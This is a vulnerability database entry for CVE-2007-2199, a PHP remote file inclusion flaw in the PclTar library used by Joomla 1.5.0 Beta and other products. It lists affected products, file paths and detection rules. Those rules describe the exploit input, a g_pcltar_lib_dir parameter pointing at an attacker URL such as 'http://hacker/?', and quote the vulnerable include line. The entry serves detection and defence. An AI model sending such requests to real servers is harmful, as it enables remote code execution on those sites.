cbcvebase.
CVE-2007-2199
published 2007-04-24

CVE-2007-2199: PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
46.76%
98.7th percentile
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.

Affected

5 ranges
VendorProductVersion rangeFixed in
cjg_explorer_procjg_explorer_pro<= 3.3
cjg_explorer_procjg_explorer_pro
joomlajoomla
nxn_x_wcms
phpsitebackupphpsitebackup

Detection & IOCsextracted from sources · hover to see the quote

path/libraries/pcl/pcltar.php
pathcep/lib/pcltar.lib.php
pathcep/lib/pcltrace.lib.php
path/phpSiteBackup-0.1/pcltar.lib.php
filenamepcltar.lib.php
filenamepcltrace.lib.php
  • Detect HTTP requests containing the 'g_pcltar_lib_dir' parameter with a remote URL value, indicating attempted PHP remote file inclusion exploitation.
  • Monitor GET requests to pcltar.lib.php or pcltrace.lib.php with g_pcltar_lib_dir set to an external URL or shell path (e.g., g_pcltar_lib_dir=http:// or g_pcltar_lib_dir=shell).
  • Monitor GET requests to /libraries/pcl/pcltar.php with g_pcltar_lib_dir parameter containing a URL (e.g., http://hacker/?) in Joomla 1.5.0 Beta deployments.
  • The vulnerable include statement dynamically includes a remote path: include($g_pcltar_lib_dir."/pclerror.lib.php"); — alert on any user-controlled value reaching this include call.
  • ·Exploitation requires PHP's allow_url_include (or allow_url_fopen) to be enabled on the server; the RFI vector is only reachable when the g_pcltar_lib_dir parameter is not sanitized and remote URL inclusion is permitted.
  • ·The vulnerability affects multiple products sharing the same PclTar library: Joomla! 1.5.0 Beta, N/X WCMS 4.5, CJG EXPLORER PRO 3.3, and phpSiteBackup 0.1 — detection rules should cover all known vulnerable paths across these products.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.